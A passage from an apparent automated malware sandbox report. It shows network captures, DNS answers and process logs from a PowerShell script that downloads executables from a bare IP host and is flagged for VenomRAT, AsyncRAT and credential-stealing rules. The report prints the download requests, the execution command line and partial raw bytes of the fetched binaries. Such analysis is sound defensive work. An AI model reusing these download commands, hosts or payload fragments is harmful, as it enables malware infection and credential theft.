                                                                              Jan 1, 2025 08:56:50.036488056 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:50.118849039 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:50.124061108 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:50.128952026 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:50.131411076 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:50.136307955 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:53.396568060 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:53.401669979 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:53.401736975 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:53.406600952 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:53.693511963 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:53.739617109 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:53.822789907 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:53.824600935 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:53.829696894 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:56:53.829761028 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:56:53.834640980 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:03.443294048 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:03.448239088 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:03.448292971 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:03.453104973 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:03.661972046 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:03.666960955 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:03.667026043 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:03.671871901 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:03.742166042 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:03.870770931 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:03.870835066 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:03.872581005 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:03.878446102 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:03.878496885 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:03.884555101 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:03.957523108 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:04.028399944 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:04.086678982 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:04.088186979 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:04.093019962 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:04.093085051 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:04.097872019 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:16.335372925 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:16.340431929 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:16.340610981 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:16.345684052 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:16.644694090 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:16.771373034 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:16.784506083 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:16.786026955 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:16.791090965 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:16.791178942 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:16.796251059 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:22.587395906 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:22.592485905 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:22.592927933 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:22.597721100 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:22.978140116 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:23.021150112 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:23.129261971 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:23.135386944 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:23.140460968 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:23.143469095 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:23.148320913 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:35.257468939 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:35.262501001 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:35.262554884 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:35.267401934 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:35.558989048 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:35.614823103 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:35.686897993 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:35.719808102 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:35.724689007 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:35.724735022 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:35.729537010 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:47.927947044 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:47.932878971 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:47.932962894 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:47.937696934 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:48.104760885 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:48.146224022 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:48.227680922 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:48.233907938 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:48.238781929 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:48.245490074 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:48.250468969 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:53.162429094 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:53.167401075 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:53.167499065 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:53.172313929 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:53.497395992 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:53.552413940 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:53.630736113 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:53.632824898 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:53.637670040 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:53.637769938 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:53.642687082 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:55.849817991 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:55.854856014 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:55.854917049 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:55.859778881 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:56.184812069 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:56.243470907 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:56.362162113 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:56.365070105 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:56.369896889 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:57:56.375457048 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:57:56.380337000 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:58:05.365545988 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:58:05.370551109 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:58:05.370608091 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:58:05.376221895 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:58:05.676321030 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:58:05.755609035 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:58:05.806806087 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:58:05.816634893 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:58:05.821496964 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:58:05.821554899 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:58:05.826328039 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:58:10.287200928 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:58:10.292227030 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:58:10.295536041 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:58:10.300374031 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:58:10.586406946 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:58:10.630659103 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:58:10.718960047 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:58:10.719769955 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:58:10.724641085 CET444949701157.20.182.177192.168.2.7
                                                                              Jan 1, 2025 08:58:10.724711895 CET497014449192.168.2.7157.20.182.177
                                                                              Jan 1, 2025 08:58:10.729499102 CET444949701157.20.182.177192.168.2.7

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Jan 1, 2025 08:54:33.265542030 CET1.1.1.1192.168.2.70xe654No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                              Jan 1, 2025 08:54:33.265542030 CET1.1.1.1192.168.2.70xe654No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false

                                                                              HTTP Request Dependency Graph

                                                                              • 147.45.44.131

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.749699147.45.44.131806372C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Jan 1, 2025 08:54:04.181976080 CET181OUTGET /infopage/vfdjo.exe HTTP/1.1
                                                                              X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                              Host: 147.45.44.131
                                                                              Connection: Keep-Alive
                                                                              Jan 1, 2025 08:54:04.812916994 CET1236INHTTP/1.1 200 OK
                                                                              Date: Wed, 01 Jan 2025 07:54:04 GMT
                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                              Last-Modified: Sat, 28 Dec 2024 19:39:12 GMT
                                                                              ETag: "8e00-62a59bbda5efb"
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 36352
                                                                              Keep-Alive: timeout=5, max=100
                                                                              Connection: Keep-Alive
                                                                              Content-Type: application/x-msdos-program
                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7b 38 bc c7 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 84 00 00 00 08 00 00 00 00 00 00 1a a3 00 00 00 20 00 00 00 c0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c8 a2 00 00 4f 00 00 00 00 c0 00 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 0c 00 00 00 ac a2 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL{8"0 @ `O H.text `.rsrc@@.reloc@BHD"h0ss(oooooi(oiiYii(oio ,o,o,o*(t0(((o*(*0rpss o!rsp~(o"&o!rs
                                                                              Jan 1, 2025 08:54:04.812937975 CET224INData Raw: 70 7e 01 00 00 04 28 02 00 00 06 6f 22 00 00 0a 26 07 17 6f 23 00 00 0a 07 17 8d 22 00 00 01 25 16 06 7e 01 00 00 04 28 02 00 00 06 a2 6f 24 00 00 0a 6f 25 00 00 0a 72 3a 74 00 70 7e 01 00 00 04 28 02 00 00 06 6f 26 00 00 0a 72 94 74 00 70 7e 01
                                                                              Data Ascii: p~(o"&o#"%~(o$o%r:tp~(o&rtp~(o'o(&*(*(*(*(*j(rtp(o*BSJBv4.0.30319l#~,P#Strings
                                                                              Jan 1, 2025 08:54:04.812948942 CET1236INData Raw: 00 00 7c 09 00 00 28 75 00 00 23 55 53 00 a4 7e 00 00 10 00 00 00 23 47 55 49 44 00 00 00 b4 7e 00 00 b4 01 00 00 23 42 6c 6f 62 00 00 00 00 00 00 00 02 00 00 01 57 15 02 00 09 00 00 00 00 fa 01 33 00 16 00 00 01 00 00 00 28 00 00 00 05 00 00 00
                                                                              Data Ascii: |(u#US~#GUID~#BlobW3((d:A:Z0444(444G4{4b{
                                                                              Jan 1, 2025 08:54:04.812985897 CET1236INData Raw: 00 4d 65 74 68 6f 64 42 61 73 65 00 44 69 73 70 6f 73 65 00 47 75 69 64 41 74 74 72 69 62 75 74 65 00 44 65 62 75 67 67 61 62 6c 65 41 74 74 72 69 62 75 74 65 00 43 6f 6d 56 69 73 69 62 6c 65 41 74 74 72 69 62 75 74 65 00 41 73 73 65 6d 62 6c 79
                                                                              Data Ascii: MethodBaseDisposeGuidAttributeDebuggableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeAssemblyFileVersionAttributeAssemblyConfigurationAttributeAssemblyDescriptionAttributeCompi
                                                                              Jan 1, 2025 08:54:04.812997103 CET1236INData Raw: 00 72 00 30 00 62 00 35 00 35 00 35 00 39 00 6d 00 6b 00 4f 00 65 00 31 00 57 00 30 00 73 00 45 00 34 00 2b 00 49 00 70 00 6f 00 42 00 53 00 30 00 4d 00 76 00 4b 00 75 00 31 00 65 00 67 00 53 00 4f 00 5a 00 62 00 4d 00 63 00 68 00 31 00 57 00 72
                                                                              Data Ascii: r0b5559mkOe1W0sE4+IpoBS0MvKu1egSOZbMch1WruvilZ0J+2G0YROJgLeSWOjgiEPmbe8MrZkewEYtD3lsGpG0rZhXWXWyRlu8mG5KMip7K7S8JQTIEhdHL
                                                                              Jan 1, 2025 08:54:04.813008070 CET672INData Raw: 00 51 00 56 00 45 00 39 00 43 00 6f 00 5a 00 76 00 79 00 45 00 75 00 51 00 68 00 37 00 57 00 5a 00 4e 00 68 00 69 00 4e 00 39 00 64 00 48 00 53 00 42 00 5a 00 74 00 67 00 64 00 6b 00 59 00 65 00 47 00 35 00 4e 00 72 00 78 00 49 00 4e 00 38 00 2b
                                                                              Data Ascii: QVE9CoZvyEuQh7WZNhiN9dHSBZtgdkYeG5NrxIN8+1tNCvnUG8tsIp0b2558g3NXvb/ka5gyTDx+HgKUf8gpUS12m2XiG3H53hibzWXAGgxTzHpj92uf5VS7M
                                                                              Jan 1, 2025 08:54:04.813069105 CET1236INData Raw: 00 46 00 37 00 7a 00 7a 00 44 00 63 00 4f 00 63 00 42 00 7a 00 61 00 70 00 6e 00 49 00 50 00 79 00 54 00 43 00 4f 00 41 00 6d 00 4f 00 64 00 57 00 34 00 4b 00 79 00 4f 00 66 00 51 00 39 00 63 00 51 00 54 00 68 00 32 00 51 00 6e 00 70 00 4d 00 72
                                                                              Data Ascii: F7zzDcOcBzapnIPyTCOAmOdW4KyOfQ9cQTh2QnpMrKbTp9OsPbSkjgcih2/5dEdA42I/HscpQ+oyp9wDwKLQI4LOVLCPUI7BSJSPLnTvTPeoXG2OXqfcZfVUx
                                                                              Jan 1, 2025 08:54:04.813081026 CET1236INData Raw: 00 42 00 45 00 36 00 7a 00 44 00 72 00 46 00 67 00 77 00 49 00 46 00 32 00 58 00 48 00 59 00 73 00 62 00 66 00 57 00 76 00 57 00 47 00 64 00 56 00 6d 00 74 00 41 00 71 00 62 00 6a 00 35 00 6c 00 79 00 57 00 77 00 6f 00 78 00 66 00 38 00 7a 00 62
                                                                              Data Ascii: BE6zDrFgwIF2XHYsbfWvWGdVmtAqbj5lyWwoxf8zbNKEPKFbx72mh1B5wGd5B/liiHgxJ8lVv+KGs8ziwUW98N9krMFBxxrrQySDFbPrikVE4DCcG1mkEhRi0
                                                                              Jan 1, 2025 08:54:04.813159943 CET1236INData Raw: 00 57 00 6d 00 4c 00 4a 00 65 00 34 00 72 00 38 00 38 00 7a 00 57 00 2b 00 70 00 6f 00 36 00 74 00 49 00 75 00 37 00 68 00 64 00 47 00 55 00 50 00 6b 00 41 00 4c 00 6d 00 76 00 77 00 6c 00 32 00 56 00 71 00 4e 00 71 00 78 00 6a 00 34 00 73 00 30
                                                                              Data Ascii: WmLJe4r88zW+po6tIu7hdGUPkALmvwl2VqNqxj4s0+BPHNfUGV7QdwTJ9MfiQ4pTm/9c+xmycu09yY+rwbQCA2m/vcG/+1EYA6QQe2aKD6p6YdWfRSAAVn2Kb
                                                                              Jan 1, 2025 08:54:04.813174009 CET1236INData Raw: 00 4e 00 35 00 6c 00 57 00 4f 00 65 00 63 00 30 00 67 00 71 00 66 00 32 00 37 00 71 00 51 00 47 00 56 00 5a 00 67 00 63 00 6e 00 4d 00 55 00 56 00 46 00 69 00 2f 00 30 00 34 00 30 00 61 00 6e 00 71 00 67 00 77 00 31 00 4e 00 33 00 33 00 77 00 38
                                                                              Data Ascii: N5lWOec0gqf27qQGVZgcnMUVFi/040anqgw1N33w83v8KwPWjvM4wFVFexNVSU90C4Zi0oxyp8cvdhoGXC1byVWTqxH/s066RUM5H2VKw3pCqwA8G0WW3/7/+
                                                                              Jan 1, 2025 08:54:04.817862988 CET1236INData Raw: 00 71 00 4a 00 47 00 48 00 47 00 57 00 53 00 4b 00 51 00 31 00 33 00 71 00 37 00 4f 00 54 00 2b 00 4a 00 31 00 4c 00 32 00 6d 00 56 00 6b 00 6a 00 4f 00 68 00 38 00 51 00 31 00 32 00 69 00 73 00 61 00 6a 00 2f 00 4f 00 30 00 4c 00 48 00 6e 00 49
                                                                              Data Ascii: qJGHGWSKQ13q7OT+J1L2mVkjOh8Q12isaj/O0LHnIJrtuhGP5rcpUlQz4swSd2zYoY6KWtee82JYp7tZ3DO58+hnW7SkhRn2dko4YAHnhQGkmeAzUwFoB39He
                                                                              Jan 1, 2025 08:54:05.470633030 CET157OUTGET /infopage/yijth.exe HTTP/1.1
                                                                              X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                              Host: 147.45.44.131
                                                                              Jan 1, 2025 08:54:05.651998997 CET1236INHTTP/1.1 200 OK
                                                                              Date: Wed, 01 Jan 2025 07:54:05 GMT
                                                                              Server: Apache/2.4.52 (Ubuntu)
                                                                              Last-Modified: Sat, 28 Dec 2024 19:34:32 GMT
                                                                              ETag: "2fdc00-62a59ab2b1730"
                                                                              Accept-Ranges: bytes
                                                                              Content-Length: 3136512
                                                                              Content-Type: application/x-msdos-program
                                                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6e 66 5c 67 00 00 00 00 00 00 00 00 e0 00 02 00 0b 01 08 00 00 ca 2f 00 00 10 00 00 00 00 00 00 be e8 2f 00 00 20 00 00 00 00 30 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 30 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 e8 2f 00 4b 00 00 00 00 00 30 00 f7 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 30 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELnf\g// 0@ @0@p/K0 0 H.text/ / `.rsrc0/@@.reloc 0/@B/HXG<4#Vwd!HAZI1YT8Dc[2njlOs]yx<mt8*B-rIg:mej{Um79;$QWAA0V0yh`4bE=WM&,C:])#lAG8B3O);"L"p<19;YF 8fK?WEw:7i(}jY2]u{1Crh:bvJn5)catiS/r68XNd/xeN[>F$y'E}+iG<


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:0
                                                                              Start time:02:54:00
                                                                              Start date:01/01/2025
                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\vfrcxq.ps1"
                                                                              Imagebase:0x7ff741d30000
                                                                              File size:452'608 bytes
                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_VenomRAT, Description: Yara detected VenomRAT, Source: 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_BrowserPasswordDump_1, Description: Yara detected BrowserPasswordDump, Source: 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Keylogger_Generic_3, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1299189117.00000219BB84B000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                              • Rule: JoeSecurity_VenomRAT, Description: Yara detected VenomRAT, Source: 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_BrowserPasswordDump_1, Description: Yara detected BrowserPasswordDump, Source: 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Keylogger_Generic_3, Description: Yara detected Keylogger Generic, Source: 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1299189117.00000219BBB6B000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:1
                                                                              Start time:02:54:00
                                                                              Start date:01/01/2025
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff75da10000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:3
                                                                              Start time:02:54:03
                                                                              Start date:01/01/2025
                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ewvozk4a\ewvozk4a.cmdline"
                                                                              Imagebase:0x7ff775be0000
                                                                              File size:2'759'232 bytes
                                                                              MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:4
                                                                              Start time:02:54:04
                                                                              Start date:01/01/2025
                                                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES1079.tmp" "c:\Users\user\AppData\Local\Temp\ewvozk4a\CSC39309A05426E407FA26B11E6D0D7414D.TMP"
                                                                              Imagebase:0x7ff727820000
                                                                              File size:52'744 bytes
